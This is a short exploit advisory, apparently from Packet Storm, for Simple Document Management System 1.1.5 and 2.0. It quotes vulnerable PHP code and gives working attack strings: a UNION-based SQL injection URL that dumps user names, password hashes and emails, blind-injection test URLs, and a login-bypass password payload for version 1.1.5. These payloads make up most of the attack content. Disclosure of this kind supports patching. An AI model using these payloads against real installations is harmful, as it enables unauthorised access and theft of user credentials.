Simple Document Management System versions 1.1.5 and 2.0 suffer from remote SQL injection and bypass vulnerabilities.
942eed47d424ad17988a30166d09e420d52d423237a5a96fc57f378242d92bd8Simple Document Management System 1.1.5 / 2.0 Multiple Vulnerabilities
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
twitter: @JossGongora
contact: sys-project[at]hotmail[dot]com
website: http://www.hack0wn.com/
download: http://mirror.us.cc.com.au/pub/cafuego/sdms
-----------
version 2.0
-----------
~~ [Multiple SQL]
/list.php?folder_id=['foo]
/detail.php?doc_id=['foo]
<code>
line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id'];
...
line 48: if(isset($order)) {
$query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order);
} else {
$query = "SELECT id,name FROM folders WHERE parent=$folder_id";
}
</code>
.xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users--
~~ [Blind]
/user_photo.php?view=[foo]
<code>
$query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view'];
$res = mysql_query($query, $sql);
if( mysql_num_rows($res) == 1 ) {
$row = mysql_fetch_array($res);
header( "Content-type: $row[mime]" );
echo "". base64_decode($row[photo]) ."";
} else {
echo "Badness!\n";
}
</code>
.poc! :: /user_photo.php?view=2+and+1=1
/user_photo.php?view=2+and+1=2
-------------
version 1.1.5
-------------
~~ [Auth Bypass]
/login.php
<code>
$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");
$row = @mysql_fetch_array($result);
if( $row[0] != 0 ) {
header("Location: index.php");
exit;
}
$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");
$row = @mysql_fetch_array($result);
$id = $row[id];
$name = $row[name];
</code>
.xpl! :: user: Admin
password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --
__h0__
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed